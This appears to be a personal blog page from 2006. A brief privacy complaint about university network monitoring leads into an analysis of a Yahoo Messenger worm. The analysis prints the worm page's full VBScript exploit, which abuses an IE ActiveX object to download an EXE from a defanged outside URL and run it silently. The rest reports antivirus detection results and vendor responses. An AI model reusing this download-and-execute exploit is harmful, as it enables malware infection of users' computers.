Beyond the irony of a copyright enforcing institution having to take down a software because of copyright violation, the software itself really annoys me. Imagine such observation shows some illegal activity going on the university network. Can this observation be used in a court of law? If not, why should such observation be done then. If yes, is it not a violation of “reasonable expectation of privacy”? If tapping someone’s internet activity is considered legal without a court order, same would hold for phone wire tapping. I am sure there is a problem in here, a huge problem!

• Washingtonpost: Brian Krebs: MPAA University ‘Toolkit’ Raises Privacy Concerns
• Wikipedia: The Internet, computers, and privacy in relation to the Fourth Amendment
• Electronic Frontier Foundation on Privacy

Is it only me who thinks so, or is it kind of silly?

Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau? http://chendang.net—-/nguyen/

I don’t know what does it mean, and take no responsibility if it means something nasty. Also I’ve added some dashes to it. Anyway, the URL in this message points to a web page with only these sentences on it:

Sao chẳng có gì để xem thế này hả trời !!!!!
Emperor cũng làm được như mấy thằng kia thôi ^_^ keke !!!

Tất cả bây giờ chỉ là con số KHÔNG

It is a worm which spreads itself using Yahoo! messenger, and infects unpatched IE users upon access to the www.chendnag.net website. You can find more information on its symptoms and removal on F-secure’s page and McAfee’s page.

This is the VB script inside that page, an old IE exploit:

<script language="VBScript">
    on error resume next
    dl = "http://www.chendang.net----/nguyen/love..exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
</script>

The fact that I have received the PM means the worm does work. I will update here if I get more data, and know if it is an old one or is just gone wild. IE users, watch out!

P.S.: My antivirus did not detect the EXE file after downloading it. So: watch out ^ 2

UPDATE:

I checked the EXE file with www.virustotal.com and these are the results:

Apparently only Kaspersky and CAT-QuickHeal(?) detect it. According to Kaspersky’s viruslist.com, it was first detected on September 17 2006, yesterday.

UPDATE #2:

After posting this blog entry, I submitted the worm sample (that EXE file it uses) to Avast! and F-Secure antivirus companies. Some hours later, F-secure reached me through e-mail and confirmed the fact it was a recently released worm:

The file, love.exe (181 KB), is verified to be malicious. It will be detected as Trojan-Downloader.Win32.Agent.axn on our next database update.

Their weblog has a note about it and another similar one here.

Ahmad, A friend of mine, had independently sent the file to McAfee AVERT. Some time later their automated system responded that the file was not a known virus, so it was “being forwarded to an AVERT Researcher for further analysis”. Some hours later, the promised researcher contacted him. He informed him that it was a new worm:

A.V.E.R.T. Sample Analysis
Issue Number: 2529850
Virus Research Engineer: *********
Identified: W32/YahLover.worm

Also, a EXTRA.DAT file was attached to this email.Removal instruction based on this DAT file and McAfee antivirus software was contained in the email as well.

No news from Avert! has been heard yet Their latest update, today, does not detect the file to be infected.

When I tried to upload the file to a test Yahoo! mail message, their Symantec powered antivirus detected it as “W32.Yautoit”. Very good news for Yahoo! users.

And, by the way, this is the scan results of www.virustotal.com after 48 hours:

As you may note, F-prot has not included this in their recent update, but McAfee has.

BTW: I’m wondering that what would happen if the worm writer used this IE exploit instead of this old exploit. This new one works even in the fully patched windows machine.